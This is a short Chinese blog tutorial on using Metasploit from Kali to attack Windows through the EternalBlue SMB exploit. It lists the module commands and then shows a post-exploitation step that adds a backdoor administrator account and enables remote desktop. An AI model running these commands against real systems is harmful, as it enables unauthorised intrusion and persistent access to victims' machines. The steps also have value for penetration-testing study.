Kali最强渗透工具——metasploit
|
3,316
|
网络攻击

316 字
|
2 分钟

metasploit是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

利用metasploit攻击windows

启动metasploit之前需要做什么

  • 打开kali终端
  • 使用sudo su命令,并输入kali的密码kali,切换至root用户
  • 使用msfdb init命令,初始化metasploit数据库(可选)

在终端输入msfconsole

msf使用法则:使用模块 —> 配置模块必选项 —> 运行模块

使用metasploit攻击永恒之蓝全流程

  • 使用模块:use exploit/windows/smb/ms17_010_eternalblue
  • 查看必选项(*required为yes的就是必选项):show options
  • 设置必选项:set xxx xxx

攻击成功后能做什么

meterpreter是强大的后渗透模块,可以输入help查看帮助信息

远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统等等,这些操作都能用meterpreter中简单的命令来完成

例:创建后门用户并开启远程连接

shell
net user Tomoe 123456 /add && net localgroup administrators Tomoe /add
exit
run getgui -e
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
web漏洞

							
							

							
使用msfvenom生成远控木马

							
							

							
Kali

							
							

							
声明